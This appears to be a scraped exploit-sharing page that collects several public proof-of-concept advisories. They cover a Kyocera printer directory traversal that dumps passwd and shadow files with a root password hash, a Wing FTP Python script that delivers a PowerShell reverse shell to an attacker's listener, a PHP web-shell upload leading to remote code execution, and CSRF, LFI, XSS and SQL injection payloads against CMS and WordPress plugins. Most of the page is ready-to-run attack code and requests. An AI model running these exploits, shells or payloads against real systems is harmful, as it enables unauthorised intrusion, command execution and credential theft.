# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) # Author: Luis Martinez # Discovery Date: 2022-02-10 # Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html # Tested Version: ECOSYS M2035dn # Tested on: Linux # Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated) # Proof of Concept: # 1.- Create a directory traversal payload # 2.- Add nullbyte to the end of the payload(%00) # 3.- Sent your request Request 1: GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1 Cookie: rtl=0 Host: X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 1: HTTP/1.1 200 OK Content-Length: 844 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 15:55:57 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh adm:x:4:4:adm:/var/adm:/bin/sh lp:x:5:7:lp:/var/spool/lpd:/bin/sh sync:x:6:8:sync:/bin:/bin/sync shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown halt:x:8:10:halt:/sbin:/sbin/halt mail:x:9:11:mail:/var/mail:/bin/sh news:x:10:12:news:/var/spool/news:/bin/sh uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh operator:x:12:0:operator:/root:/bin/sh games:x:13:60:games:/usr/games:/bin/sh ftp:x:15:14:ftp:/var/ftp:/bin/sh man:x:16:20:man:/var/cache/man:/bin/sh www:x:17:18:www-data:/var/www:/bin/sh sshd:x:18:19:sshd:/var/run/sshd:/bin/sh proxy:x:19:21:proxy:/bin:/bin/sh telnetd:x:20:22:proxy:/bin:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh ais:x:101:101:ais:/var/run/ais:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Request 2: GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1 Cookie: rtl=0 Host: X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 2: HTTP/1.1 200 OK Content-Length: 480 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 16:10:16 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873:::::: bin:*:15873:::::: daemon:*:15873:::::: sys:*:15873:::::: adm:*:15873:::::: lp:*:15873:::::: sync:*:15873:::::: shutdown:*:15873:::::: halt:*:15873:::::: mail:*:15873:::::: news:*:15873:::::: uucp:*:15873:::::: operator:*:15873:::::: games:*:15873:::::: ftp:*:15873:::::: man:*:15873:::::: www:*:15873:::::: sshd:*:15873:::::: proxy:*:15873:::::: telnetd:*:15873:::::: backup:*:15873:::::: ais:*:15873:::::: nobody:*:15873::::::
HireHackking

Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)

HACKER · %s · %s

# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) # Date: 2022-02-09 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://subrion.org # Software Link: https://subrion.org/download # Version: 4.2.1 # Tested on: Windows 10 # [ About - Subrion CMS ]: #Subrion is a PHP/MySQL based CMS & framework, #that allows you to build websites for any purpose, #Yes, from blog to corporate mega portal. # [ Description ]: # CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS, # With this vulnerability, authorized users can be added to the system. # [ Sample CSRF Request ]: POST /subrion/panel/members/add/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902 Content-Length: 2522 Origin: http://localhost Connection: close Referer: http://localhost/subrion/panel/members/add/ Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="__st" YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="username" Aryan -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="fullname" AryanChehreghani -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email" aryanchehreghani@yahoo.com -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password" Test1234! -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password2" Test1234! -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="usergroup_id" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="website" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="phone" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="biography" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="facebook" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="twitter" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="gplus" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="linkedin" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email_language" en -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="sponsored" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured_end" 2022-03-09 12:03 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="status" active -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="save" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="goto" list -----------------------------386122140640094420852486902--
HireHackking
# Exploit Title: Wing FTP Server - Authenticated RCE # Date: 02/06/2022 # Exploit Author: notcos # Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes. # Vendor Homepage: https://www.wftpserver.com/ # Software Link: https://www.wftpserver.com/download/WingFtpServer.exe # Version: <=4.3.8 # Tested on: Windows # !/usr/bin/python3 import requests import sys import base64 import urllib.parse # Get command line arguments if len(sys.argv) != 7: print("This exploit will invoke a nishang tcp reverse shell on the target. Start your listener before executing.") print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT> <USER> <PASSWORD>" % sys.argv[0]) print("Example: %s 0.0.0.0 8000 127.0.0.1 9001 notcos coolpass" % sys.argv[0]) exit(1) else: target = sys.argv[1] targetport = sys.argv[2] localip = sys.argv[3] localport = sys.argv[4] user = sys.argv[5] password = sys.argv[6] print(''' .--. / ,~a`-, \ \_.-"` ) ( __ __ .__ ____ __________ _________ ___________ ,/ ."\ / \ / \|__| ____ / ___\ \______ \\\\_ ___ \ \_ _____/ / ( | \ \/\/ /| | / \ / /_/ > | _// \ \/ | __)_ / ) ; \ / | || | \ \___ / | | \\\\ \____ | \\ / / / \__/\ / |__||___| //_____/ |____|_ / \______ //_______ / ,/_."` /` \/ \/ \/ \/ \/ /_/\ |___ `~~~~~` ''') # Create the login request url = 'http://' + target + ':' + targetport + '/admin_loginok.html' data = ('username=' + user + '&password=' + password + '&username_val=' + user + '&password_val=' + password + '&su' 'bmit_btn=%2bLogin%2b') headers = { "User-Agent": "Googlebot" } # Send the POST request to log in and save the cookie r = requests.post(url, headers=headers, data=data) cookie = 'UIDADMIN=' + r.cookies['UIDADMIN'] print('Login successful - Cookie: ' + cookie) url = "http://" + target + ":" + targetport + "/admin_lua_script.html" headers = { "User-Agent": "Googlebot", "Cookie": cookie, } # Base64 encode a nishang reverse tcp shell one liner and then url encode it nish = ("$client = New-Object System.Net.Sockets.TCPClient(\"" + localip + "\"," + localport + ");$stream = $client" ".GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$d" "ata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1" " | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCI" "I).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()") encodedStr = str(base64.b64encode(nish.encode('UTF-16LE')), "UTF8") urlpayload = urllib.parse.quote(encodedStr, safe='+') finalload = "command=os.execute('powershell -Encodedcommand " + urlpayload + "')" # Send the reverse shell payload try: r = requests.post(url, headers=headers, data=finalload, timeout=0.1) except requests.exceptions.ReadTimeout: print("The payload has been sent. Check your listener.") pass
HireHackking
# Exploit Title: WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS) # Date: 2022-01-26 # Exploit Author: Shweta Mahajan # Vendor Homepage: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/ # Software Link: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/ # Tested on Windows # CVE: CVE-2021-24901 # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24901 https://wpscan.com/vulnerability/9c315404-b66a-448c-a3b7-367a37b53435 How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate Titan-labs-security-audit Version 1.0.0 3. Navigate to Security Audit settings >> enter the payload into 'Data Id'. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(1)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
HireHackking

Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion # Date: 2022-02-06 # Exploit Author: Ven3xy # Vendor Homepage: https://wordpress.org/plugins/simple-job-board/ # Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip # Version: 2.9.3 # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2020-35749 import requests import sys import time class color: HEADER = '\033[95m' IMPORTANT = '\33[35m' NOTICE = '\033[33m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' LOGGING = '\33[34m' color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] def banner(): run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8 Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__ Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888 Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888 Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888 Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/ 888 888 \n''' run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n''' run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' print(run+run2+run3) if (len(sys.argv) != 5): banner() print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>") print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin") exit() else: banner() fetch_path = sys.argv[2] print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path) time.sleep(3) target_url = sys.argv[1] usernamex = sys.argv[3] passwordx = sys.argv[4] print("\n") login = target_url+"wp-login.php" wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path username = usernamex password = passwordx with requests.Session() as s: headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check', 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' } post_data={ 'log':username, 'pwd':password, 'wp-submit':'Log In','redirect_to':wp_path, 'testcookie':'1' } s.post(login, headers=headers, data=post_data) resp = s.get(wp_path) out_file = open("output.txt", "w") print(resp.text, file=out_file) out_file.close() print(color_random[4]+resp.text) out = color_random[5]+"\n[+] Output Saved as: output.txt\n" print(out)
HireHackking
# Exploit Title: WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS) # Date: 2022-02-02 # Exploit Author: Shweta Mahajan # Vendor Homepage: https://wordpress.org/plugins/cp-blocks/ # Software Link: https://wordpress.org/plugins/cp-blocks/ # Tested on Windows # CVE: CVE-2022-0448 # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0448 https://wpscan.com/vulnerability/d4ff63ee-28e6-486e-9aa7-c878b97f707c How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate CP Blocks Version 1.0.14 3. Navigate to CP Blocks - License >> enter the payload into 'License ID'. 4. Enter JavaScript payload which is mentioned below "><script>alert(0)</script> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
HireHackking

AtomCMS v2.0 - SQLi

HACKER · %s · %s

# Exploit Title: AtomCMS v2.0 - SQLi # Date: 08/02/2022 # Exploit Author: Luca Cuzzolin aka czz78 # Vendor Homepage: https://github.com/thedigicraft/Atom.CMS # Version: v2.0 # Category: Webapps # Tested on: Debian linux # CVE : CVE-2022-24223 ==================================================== # PoC : SQLi : http://127.0.0.1/Atom.CMS/admin/login.php POST /Atom.CMS/admin/login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 35 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/Atom.CMS/admin/login.php Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 email=test%40test.com&password=1234 Vulnerable Payload : Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=test@test.com' AND (SELECT 5613 FROM (SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: email=test@test.com' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL-- -&password=1234 Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- - --- ====================================================
HireHackking

Hospital Management Startup 1.0 - 'Multiple' SQLi

HACKER · %s · %s

# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi # Exploit Author: nu11secur1ty # Date: 02.10.2022 # Vendor: https://github.com/kabirkhyrul # Software: https://github.com/kabirkhyrul/HMS # CVE-2022-23366 # Description: The loginid and password parameters from Hospital Management Startup 1.0 appear to be vulnerable to SQL injection attacks. The attacker can retrieve all information from the administrator account of the system and he can use the information for malicious purposes! WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: ```mysql --- Parameter: loginid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND (SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND 'sDHP'='sDHP&rememberme=on&submit=Login --- ``` # Reproduce: https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366
HireHackking
# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Vulnerable Code line 68 in file "/hocms/admin/members/view_member.php" $collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc"); # Sqlmap command: sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch # Output: Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member
HireHackking
# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Request sent as base user POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215 Content-Length: 769 Origin: http://localhost Connection: close Referer: http://localhost/hocms/admin/?page=system_info Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="name" Home Owners Collection Management System' -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="short_name" HOCMS - PHP -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="cover"; filename="cmd.php" Content-Type: application/x-php <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------31935477191495174627236953215-- # Response HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:32:16 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju Upgrade-Insecure-Requests: 1 # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:39:06 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Access-Control-Allow-Origin: * Content-Length: 33 Connection: close Content-Type: text/html; charset=UTF-8 0xSaudi </pre> </body> </html>
HireHackking
# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS) # Date: 2022-02-07 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/contact-forms-builder/ # Version: 1.6.1 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
HireHackking
# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 09.02.2022 ######## Description ######## # # # Authenticate and get update user settings will be appear the # id paramater put your payload at there it'll be work # # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa Upgrade-Insecure-Requests: 1